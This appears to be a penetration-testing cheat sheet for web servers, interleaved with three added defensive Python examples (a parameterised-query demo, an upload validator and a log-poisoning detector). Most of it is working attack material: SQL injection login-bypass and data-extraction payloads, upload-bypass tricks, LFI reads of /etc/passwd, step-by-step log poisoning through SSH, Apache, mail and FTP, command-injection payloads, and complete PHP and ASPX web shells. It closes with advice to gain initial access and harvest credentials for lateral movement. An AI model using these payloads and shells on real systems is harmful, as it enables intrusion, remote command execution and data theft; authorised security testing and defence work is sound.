Hypertext Transfer Protocol (HTTP)
Manual Inspection
Environment Variables / Setup
export IP=
export PORT=80
export URL=http://$IP:$PORT
Initial Reconnaissance
Nmap HTTP Scripts
nmap --script=http-enum,http-headers,http-methods,http-robots.txt,http-title -p$PORT $IP
Nikto
nikto -h $URL -o nikto_results.txt
Technology Stack Identification
whatweb
whatweb $URL
Wappalyzer (Browser Extension)
Quick Manual Checks
Robots.txt & Common Files
curl $URL/robots.txt
curl $URL/sitemap.xml
curl $URL/.git/config
curl $URL/backup.zip
curl $URL/web.config
Directory Enumeration
ffuf -u $URL/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -fc 404 -t 50
Manual Source Code Review
Look for:
- Hidden form fields
- JavaScript files with sensitive info
- Comments containing credentials/paths
- AJAX endpoints
curl $URL | grep -i -E "(password|user|admin|login|sql|database|config)"
Phase 4: Web Application Attacks
Authentication Bypass
Default Credentials
Common defaults for discovered applications:
- admin:admin, admin:password, root:root, etc.
SQL Injection in Login Forms
# Test basic SQLi in username field:
admin' OR '1'='1'--
admin'/**/OR/**/1=1--
admin' OR 1=1#
# Test in both username and password fields
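The login bypass above, and why a parameterised query stops it, as an added example that is not part of the original notes: a constructed in-memory SQLite users table is queried first by string splicing and then with bound parameters, using the page's own `--` payloads (the `#` variant is left out because SQLite does not treat `#` as a comment).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext passwords only to keep the demo short; real systems store hashes.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The bug: input is spliced into the SQL text.  A quote in the username
    # closes the literal and everything after it is parsed as SQL, so
    #   admin' OR '1'='1'--
    # turns the WHERE clause into  username = 'admin' OR '1'='1'  and the
    # trailing -- comments out the password check entirely.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The fix: a parameterised query.  The statement text is fixed and the
    # values travel separately, so a quote in the input is only data.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def compare(conn: sqlite3.Connection, payloads: list) -> dict:
    """For each username payload (with a bogus password) report (vulnerable, safe)."""
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in payloads}


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in compare(db, ["admin' OR '1'='1'--",
                                              "admin'/**/OR/**/1=1--"]).items():
        print(f"{payload!r:32} vulnerable={vuln} parameterised={safe}")
```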
SQL Injection Testing
Manual Detection
# Test these payloads in parameters:
'
"
\
;
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' UNION SELECT 1,2,3--
Parameter Testing with ffuf
# Test GET parameters
ffuf -u "$URL/page.php?id=FUZZ" -w /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt
# Test POST parameters with Burp Suite or manual testing
Union-Based SQLi Exploitation
# Find number of columns
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
# Continue until no error
# Extract database info
' UNION SELECT 1,database(),version()--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,username,password FROM users--
File Upload Vulnerabilities
Test File Upload Restrictions
# Try uploading:
- .php, .asp, .aspx files
- Files with double extensions (.php.jpg)
- Files with null bytes (shell.php%00.jpg)
- .htaccess files to change execution permissions
PHP Web Shell
<?php system($_GET['cmd']); ?>
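A server-side check that closes each bypass in the list above (executable extensions, double extensions, null bytes, .htaccess), as an added defender-side example that is not from the original notes. The extension allowlist, the magic-byte table and the rejection strings are my own choices for the example.

```python
import os
import secrets
from typing import Optional, Tuple

# Allowed final extensions and the file signature (magic bytes) each must carry.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
# Extensions that must never appear in *any* position of the name.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                     "asp", "aspx", "ashx", "jsp", "jspx", "htaccess", "cgi"}


def validate_upload(filename: str, data: bytes) -> Tuple[Optional[str], Optional[str]]:
    """Return (stored_name, None) when accepted or (None, reason) when rejected."""
    # shell.php%00.jpg: a NUL (raw or still URL-encoded) truncates the name in
    # C-based code paths, so reject it outright instead of trying to repair it.
    if "\x00" in filename or "%00" in filename:
        return None, "null byte in filename"
    # Drop any directory part the client supplied (../ or C:\ style).
    name = os.path.basename(filename.replace("\\", "/"))
    # Dotfiles cover .htaccess, which could re-enable script execution in the
    # upload directory on Apache.
    if not name or name.startswith("."):
        return None, "empty or dotfile name"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None, "no extension"
    exts = parts[1:]
    # Double extensions (shell.php.jpg): check every segment, not just the last.
    if any(e in SERVER_EXECUTABLE for e in exts):
        return None, "server-executable extension present"
    final = exts[-1]
    if final not in ALLOWED_MAGIC:
        return None, "extension not in allowlist"
    # A .jpg whose bytes do not start with the JPEG signature is not an image.
    if not data.startswith(ALLOWED_MAGIC[final]):
        return None, "content does not match extension"
    # Never keep the client's name: store under a random server-chosen one.
    return f"{secrets.token_hex(16)}.{final}", None


if __name__ == "__main__":
    for fname, blob in [("photo.jpg", b"\xff\xd8\xff\xe0"), ("shell.php.jpg", b"\xff\xd8\xff"),
                        ("shell.php%00.jpg", b"\xff\xd8\xff"), (".htaccess", b"AddType")]:
        print(f"{fname:20} -> {validate_upload(fname, blob)}")
```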
Local File Inclusion (LFI)
Common LFI Parameters
Test these parameters for LFI:
?file=
?page=
?include=
?path=
?doc=
LFI Payloads
../../../etc/passwd
../../../windows/system32/drivers/etc/hosts
php://filter/convert.base64-encode/resource=config.php
Log Poisoning via LFI
# SSH Log Poisoning (Linux)
# 1. Attempt SSH connection with PHP payload as username
ssh '<?php system($_GET["cmd"]); ?>'@target_ip
# 2. Include SSH log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/auth.log&cmd=whoami"
# Apache Log Poisoning
# 1. Send request with PHP payload in User-Agent
curl -A '<?php system($_GET["cmd"]); ?>' http://target/
# 2. Include Apache log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/apache2/access.log&cmd=whoami"
# Mail Log Poisoning
# 1. Send email with PHP payload
telnet target 25
MAIL FROM: <?php system($_GET["cmd"]); ?>
RCPT TO: user@target.com
quit
# 2. Include mail log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/mail.log&cmd=whoami"
# FTP Log Poisoning
# 1. Connect to FTP with PHP payload as username
ftp target
user: <?php system($_GET["cmd"]); ?>
# 2. Include FTP log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/vsftpd.log&cmd=whoami"
Common log file locations:
# Linux logs
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/mail.log
/var/log/vsftpd.log
# Windows logs
C:\xampp\apache\logs\access.log
C:\wamp\logs\access.log
C:\inetpub\logs\LogFiles\W3SVC1\
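Every poisoning variant above leaves the PHP tag in a logged field, and the include step leaves a traversal, a `php://` wrapper or a log path in the request line. As an added detection example (not part of the original notes), this parses Apache combined-format lines, URL-decodes them until stable so `%2e%2e%2f` and double encoding are caught, and flags both halves of the attack. The log lines and the finding names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format; referer and UA may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
LFI_PATTERNS = [
    ("traversal", re.compile(r"\.\./|\.\.\\")),
    ("php-wrapper", re.compile(r"php://", re.IGNORECASE)),
    ("log-file-include", re.compile(r"/var/log/|apache\\logs|\\LogFiles\\", re.IGNORECASE)),
    ("sensitive-file", re.compile(r"/etc/passwd|/etc/shadow|system32", re.IGNORECASE)),
]

def normalise(value: str) -> str:
    """URL-decode until stable so %2e%2e%2f and double encoding read plainly."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value

def analyse_line(line: str) -> list:
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    path, ua, ref = (normalise(m[g]) for g in ("path", "ua", "referer"))
    findings = []
    # A PHP tag in any logged field is the signature of a log-poisoning attempt.
    if any(PHP_TAG.search(field) for field in (path, ua, ref)):
        findings.append("php-tag-in-request")
    findings += [name for name, rx in LFI_PATTERNS if rx.search(path)]
    return findings

def analyse(lines: list) -> list:
    return [analyse_line(line) for line in lines]

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\"cmd\"]); ?>"',
    r'198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /vulnerable.php?file=../../../var/log/apache2/access.log&cmd=whoami HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    r'198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /vulnerable.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1604 "-" "curl/7.88.1"',
    r'198.51.100.7 - - [10/Oct/2023:13:56:15 +0000] "GET /vulnerable.php?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 940 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, analyse(SAMPLE_LOG)):
        print(hits or ["clean"], line[:72])
```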
Cross-Site Scripting (XSS)
Reflected XSS Test
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
Stored XSS Test
Test in comment fields, user profiles, etc.
Command Injection
Common Injection Points
URL parameters and form fields whose values may be passed to system commands
Test Payloads
; whoami
| whoami
& whoami
&& whoami
`whoami`
$(whoami)
Phase 5: Burp Suite Manual Testing
Setup
- Configure proxy (127.0.0.1:8080)
- Spider the application
- Review sitemap for interesting endpoints
Manual Testing Checklist
- Test all forms for SQLi, XSS, CSRF
- Check file upload functionality
- Test session management (cookies, tokens)
- Look for admin panels or debugging interfaces
- Test API endpoints if discovered
- Check for IDOR vulnerabilities
Phase 6: CMS-Specific Attacks
WordPress
wpscan --url $URL --enumerate ap,at,u
Joomla
joomscan -u $URL
Drupal
droopescan scan drupal -u $URL
Common Web Shells & Payloads
PHP Web Shell
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>
ASPX Web Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    void Page_Load(object sender, EventArgs e) {
        string cmd = Request["cmd"];
        if (cmd != null) {
            Response.Write(ExecuteCommand(cmd));
        }
    }

    string ExecuteCommand(string command) {
        Process p = new Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + command;
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.Start();
        return p.StandardOutput.ReadToEnd();
    }
</script>
Next Steps
Once web enumeration is complete:
- Document all findings in main template
- Prioritize vulnerabilities by exploitability
- Attempt exploitation for initial access
- Look for credentials in web files for lateral movement